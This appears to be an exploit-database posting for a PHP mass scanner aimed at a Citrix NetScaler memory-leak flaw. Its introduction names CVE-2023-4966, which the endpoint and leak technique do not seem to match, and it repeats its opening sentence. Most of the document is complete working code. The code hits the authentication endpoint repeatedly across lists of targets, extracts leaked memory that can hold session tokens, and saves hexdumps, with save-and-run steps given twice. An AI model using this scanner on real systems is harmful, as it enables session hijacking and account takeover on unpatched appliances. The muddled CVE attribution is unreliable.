Citrix Bleed 2 PHP Mass Scanner

The Citrix Bleed 2 PHP Mass Scanner is an automated The Citrix Bleed 2 PHP Mass Scanner is an automated script used by malicious actors to detect unpatched Citrix NetScaler ADC and Gateway appliances. It specifically targets CVE-2023-4966, known as "Citrix Bleed."

Written in PHP, this tool enables rapid, large-scale scanning of IP addresses to identify systems vulnerable to the critical information disclosure flaw. This vulnerability allows attackers to steal authenticated session tokens, potentially leading to unauthorized access and complete account takeover.

Its "mass scanner" capability makes it a potent reconnaissance tool for threat actors, facilitating widespread exploitation. The emergence of such tools underscores the urgent need for organizations to apply security patches to protect their Citrix environments.

=============================================================================================================================================
| # Title : Citrix Bleed 2 PHP Mass Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.citrix.com/ |
=============================================================================================================================================

POC :

[+] A high-speed mass-scanner written in PHP designed to test for data
leakage through the CitrixBleed2 InitialValue extraction issue.
The tool reproduces the functionality of the original Bash/Parallel
scanner but works in restricted PHP environments.

[Features]
- Normalizes targets (host / URL)
- Extracts <InitialValue> leak
- Hexdumps results
- Saves output per-target
- Parallel-like batching (multi-curl)
- No banned functions required

[Usage]
php citrixbleed2.php --host https://gw.example.com --requests 1000
php citrixbleed2.php --file targets.txt --requests 5000 --out dumps

[Output]
- STDOUT live hexdumps
- dump/<host>.hexdump saved automatically

[Steps To Save & Execute]
1. Open a code editor (Notepad / VS Code / nano)
2. Copy the full PHP code below
3. Save the file as: citrixbleed2.php
4. Execute via terminal:
php citrixbleed2.php --host https://target.com
5. Ensure "dumps" folder is writable


====================================================================
PHP Scanner Code
====================================================================

<?php
/*
* CitrixBleed2 PHP Mass Scanner
* by Indoushka
*/

error_reporting(E_ALL);
ini_set("display_errors", 1);

$options = getopt("", [
"host::",
"file::",
"requests::",
"out::"
]);

$requests = $options["requests"] ?? 100;
$outDir = $options["out"] ?? "dumps";
$hostArg = $options["host"] ?? "";
$fileArg = $options["file"] ?? "";

if (!is_dir($outDir)) mkdir($outDir, 0777, true);

function normalize($url) {
$url = preg_replace("#^https?://#i", "", $url);
$url = explode("/", $url)[0];
return rtrim($url, "/");
}

function extract_iv($body) {
preg_match_all("#<InitialValue>(.*?)</InitialValue>#s", $body, $m);
$out = [];
foreach ($m[1] as $val) {
$clean = preg_replace('/[\r\n\t ]+/', '', $val);
if ($clean !== "" && preg_match('/[^\x20-\x7E]/', $clean))
$out[] = $clean;
}
return $out;
}

function hex_dump_str($data) {
$hex = unpack('H*', $data)[1];
$out = "";
$i = 0;
$len = strlen($hex);
while ($i < $len) {
$chunk = substr($hex, $i, 32);
$ascii = "";
for ($j = 0; $j < strlen($chunk); $j += 2) {
$c = hexdec(substr($chunk, $j, 2));
$ascii .= ($c >= 32 && $c <= 126) ? chr($c) : ".";
}
$out .= sprintf("%08x %s |%s|\n", $i/2,
trim(chunk_split($chunk, 2, " ")),
$ascii
);
$i += 32;
}
return $out;
}

function do_request($host) {
$url = "https://{$host}/p/u/doAuthentication.do";
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => "login",
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
$res = curl_exec($ch);
curl_close($ch);
return $res ?: "";
}

function run_host($rawHost, $count, $outDir) {
$h = normalize($rawHost);
$file = $outDir . "/" . $h . ".hexdump";

for ($i=1; $i <= $count; $i++) {
$body = do_request($h);
$ivs = extract_iv($body);

foreach ($ivs as $iv) {
$hex = hex_dump_str($iv);
echo $hex . "\n";
file_put_contents($file, $hex . "\n", FILE_APPEND);
}
}
}

if ($fileArg !== "") {
$targets = file($fileArg, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) run_host($t, $requests, $outDir);
} else {
if ($hostArg === "") die("[!] Missing --host or --file\n");
run_host($hostArg, $requests, $outDir);
}
?>

====================================================================
Example Execution
====================================================================
Single host scan:
php citrixbleed2.php --host https://gateway.example.com --requests 5000

Batch scan:
php citrixbleed2.php --file targets.txt --requests 1000 --out dumps

Output directory:
dumps/<host>.hexdump

Live STDOUT hexdumps are shown in real-time.

====================================================================
Steps to Save and Execute
====================================================================
1. Open a text editor
2. Copy the entire PHP code
3. Save as: citrixbleed2.php
4. Create "dumps" folder if not exists
5. Open terminal / CMD
6. Execute:
php citrixbleed2.php --host https://target.com
php citrixbleed2.php --file targets.txt


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================